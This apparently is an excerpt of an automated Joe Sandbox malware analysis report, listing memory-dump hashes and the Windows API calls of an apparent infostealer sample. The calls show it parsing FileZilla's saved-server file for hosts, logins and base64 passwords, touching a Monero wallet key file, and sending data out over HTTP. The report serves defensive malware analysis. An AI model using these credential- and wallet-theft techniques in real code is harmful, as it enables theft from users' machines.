                                   • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Ciw{$`1{>
                                  • API String ID: 0-2717700013
                                  • Opcode ID: 0ee9fc03845b36adea4d224fb94b08f81a6999a0ee9c22598c78b0cb53232b2d
                                  • Instruction ID: 32beabf94ba40b557dfccca0aaf488fa9b5b24735c26bc961abc2cca3ff473ba
                                  • Opcode Fuzzy Hash: 0ee9fc03845b36adea4d224fb94b08f81a6999a0ee9c22598c78b0cb53232b2d
                                  • Instruction Fuzzy Hash: F941F7F310C7089FE3116E29ECD177AFBD8EB94720F16492EE6C0C7740E97999448696
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: WD|
                                  • API String ID: 0-1174168260
                                  • Opcode ID: a67881a9d9eafe66f8581bc5fa30f9aff041138b1826d44f86e896fcdc1ad326
                                  • Instruction ID: 926fa9c763e0e2ca07921732e273a1e7c9d6e1c3712851a38d2c13e965b0b887
                                  • Opcode Fuzzy Hash: a67881a9d9eafe66f8581bc5fa30f9aff041138b1826d44f86e896fcdc1ad326
                                  • Instruction Fuzzy Hash: 60D137F3A08204AFE3046E2DDC8567ABBE9EF94720F1A853DEAC4C3344E93559158797
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ]uk
                                  • API String ID: 0-4227159379
                                  • Opcode ID: e85c00e9875f8f1d2d9f198a024dbc39f9488ddea2ba9f040fd021a7e3a2f233
                                  • Instruction ID: 15d2fb2adf2d7386386db49a74f21e5df5609db8bb86b4b79b93dba3592de690
                                  • Opcode Fuzzy Hash: e85c00e9875f8f1d2d9f198a024dbc39f9488ddea2ba9f040fd021a7e3a2f233
                                  • Instruction Fuzzy Hash: 3F7127F3B082109FF304AE2DEC9577AB6D6DBD4310F2B853DD68487784ED7898068286
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: <1l_
                                  • API String ID: 0-2358017900
                                  • Opcode ID: a7169c155a811faa412d28ce4bfa7e891a28ac0bebe2dac832667d1b9b474fa8
                                  • Instruction ID: 2674bec347df89cbd5acc03cfb8b457e144cf83f8be1d295e5c65b81af689bff
                                  • Opcode Fuzzy Hash: a7169c155a811faa412d28ce4bfa7e891a28ac0bebe2dac832667d1b9b474fa8
                                  • Instruction Fuzzy Hash: DA614BF3E186149BE3046E39EC897A77BD6EB94320F1A463DEAC4D77C4E53988418385
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: be4138c63b30bc192a10e71edd6dd817e61d907fd9479d8f7f416e3e23cc78c6
                                  • Instruction ID: 475c3810aac17fdf9b159a3b8b93ef345df47c33b2233c1944679262e330d335
                                  • Opcode Fuzzy Hash: be4138c63b30bc192a10e71edd6dd817e61d907fd9479d8f7f416e3e23cc78c6
                                  • Instruction Fuzzy Hash: 7051D4B39082109FE314AF2DDC8576AFBE5EF94720F16893DDAC8C7340E63958548796
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5d791a2c18975dd64afc06f09ea3ef5991b293c238fa32510ebbdf774e5b073f
                                  • Instruction ID: 59d92e526f9c102bf012e9258e17424df2a81363c4e320902d190425b372681d
                                  • Opcode Fuzzy Hash: 5d791a2c18975dd64afc06f09ea3ef5991b293c238fa32510ebbdf774e5b073f
                                  • Instruction Fuzzy Hash: B6318DF390C2045BE304AD7DEC84727F7DAEBD4320F2A853DE585C7784E979A9058196
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6b3c1e542bf38f7a4e53bee15f0734f3164c7d05909458c1f88aa160fd52c782
                                  • Instruction ID: 119beb076d44aba6b3f3233d3c82b049a9fd317ab92189d69ea95d2ff4cb841d
                                  • Opcode Fuzzy Hash: 6b3c1e542bf38f7a4e53bee15f0734f3164c7d05909458c1f88aa160fd52c782
                                  • Instruction Fuzzy Hash: FD31E2B250D704DBE309AE2AD85063EF7E6FF94710F56882DE5C24765CEA384881CB87
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d0219d18d9555d0f09da4426a590f14220a164f5da5157b4cc252352a61702a6
                                  • Instruction ID: 010b628717921a7ae4629a69b2d69c72758409c063fe3909e7d6a1469baa3ed3
                                  • Opcode Fuzzy Hash: d0219d18d9555d0f09da4426a590f14220a164f5da5157b4cc252352a61702a6
                                  • Instruction Fuzzy Hash: 3B3106B100C7049FE7097F28D8966BAFBE4FF18310F56092DE6C686250EA755890DB9B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BB8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BB8E0B
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BBA7E6
                                    • Part of subcall function 00BA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BA99EC
                                    • Part of subcall function 00BA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BA9A11
                                    • Part of subcall function 00BA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BA9A31
                                    • Part of subcall function 00BA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BA148F,00000000), ref: 00BA9A5A
                                    • Part of subcall function 00BA99C0: LocalFree.KERNEL32(00BA148F), ref: 00BA9A90
                                    • Part of subcall function 00BA99C0: CloseHandle.KERNEL32(000000FF), ref: 00BA9A9A
                                    • Part of subcall function 00BB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BB8E52
                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00BC0DBA,00BC0DB7,00BC0DB6,00BC0DB3), ref: 00BB0362
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB0369
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00BB0385
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB2), ref: 00BB0393
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 00BB03CF
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB2), ref: 00BB03DD
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00BB0419
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB2), ref: 00BB0427
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00BB0463
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB2), ref: 00BB0475
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB2), ref: 00BB0502
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB2), ref: 00BB051A
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB2), ref: 00BB0532
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB2), ref: 00BB054A
                                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00BB0562
                                  • lstrcat.KERNEL32(?,profile: null), ref: 00BB0571
                                  • lstrcat.KERNEL32(?,url: ), ref: 00BB0580
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB0593
                                  • lstrcat.KERNEL32(?,00BC1678), ref: 00BB05A2
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB05B5
                                  • lstrcat.KERNEL32(?,00BC167C), ref: 00BB05C4
                                  • lstrcat.KERNEL32(?,login: ), ref: 00BB05D3
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB05E6
                                  • lstrcat.KERNEL32(?,00BC1688), ref: 00BB05F5
                                  • lstrcat.KERNEL32(?,password: ), ref: 00BB0604
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB0617
                                  • lstrcat.KERNEL32(?,00BC1698), ref: 00BB0626
                                  • lstrcat.KERNEL32(?,00BC169C), ref: 00BB0635
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB2), ref: 00BB068E
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 1942843190-555421843
                                  • Opcode ID: b6bc9ea29daa098972bae7d41d01f105e0a9709d638a439343477f8f86932dae
                                  • Instruction ID: 521780408f22560c1c211fb72508210b7ff794dd4c0949d12d4aa57a7671fd29
                                  • Opcode Fuzzy Hash: b6bc9ea29daa098972bae7d41d01f105e0a9709d638a439343477f8f86932dae
                                  • Instruction Fuzzy Hash: FED1F971D10209ABCB04FBE4DD96EFE77B8AF14301F504598F502BA191DEB4AA46CB72
                                  APIs
                                    • Part of subcall function 00BBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BBA7E6
                                    • Part of subcall function 00BA47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BA4839
                                    • Part of subcall function 00BA47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BA4849
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00BA59F8
                                  • StrCmpCA.SHLWAPI(?,01410EE0), ref: 00BA5A13
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BA5B93
                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,01410E90,00000000,?,0140FF40,00000000,?,00BC1A1C), ref: 00BA5E71
                                  • lstrlen.KERNEL32(00000000), ref: 00BA5E82
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00BA5E93
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BA5E9A
                                  • lstrlen.KERNEL32(00000000), ref: 00BA5EAF
                                  • lstrlen.KERNEL32(00000000), ref: 00BA5ED8
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00BA5EF1
                                  • lstrlen.KERNEL32(00000000,?,?), ref: 00BA5F1B
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00BA5F2F
                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00BA5F4C
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA5FB0
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA5FBD
                                  • HttpOpenRequestA.WININET(00000000,01410F10,?,01410328,00000000,00000000,00400100,00000000), ref: 00BA5BF8
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA5FC7
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 874700897-2180234286
                                  • Opcode ID: abb9f23f947a01ebbbe393d4b8b1ccb227d9d9bc495f97a93609c1fd7f604a39
                                  • Instruction ID: 2d955d9c0d4e3e6eeba9d0938ebc2436eb5b469e367a26bee5830c80816419b1
                                  • Opcode Fuzzy Hash: abb9f23f947a01ebbbe393d4b8b1ccb227d9d9bc495f97a93609c1fd7f604a39
                                  • Instruction Fuzzy Hash: CA12DA71C20118BBDB15EBA4DCA5FEEB3B8BF14700F5041D9B106B6591EFB02A4ACB65
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                    • Part of subcall function 00BB8B60: GetSystemTime.KERNEL32(00BC0E1A,0140FD60,00BC05AE,?,?,00BA13F9,?,0000001A,00BC0E1A,00000000,?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BB8B86
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BACF83
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00BAD0C7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BAD0CE
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BAD208
                                  • lstrcat.KERNEL32(?,00BC1478), ref: 00BAD217
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BAD22A
                                  • lstrcat.KERNEL32(?,00BC147C), ref: 00BAD239
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BAD24C
                                  • lstrcat.KERNEL32(?,00BC1480), ref: 00BAD25B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BAD26E
                                  • lstrcat.KERNEL32(?,00BC1484), ref: 00BAD27D
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BAD290
                                  • lstrcat.KERNEL32(?,00BC1488), ref: 00BAD29F
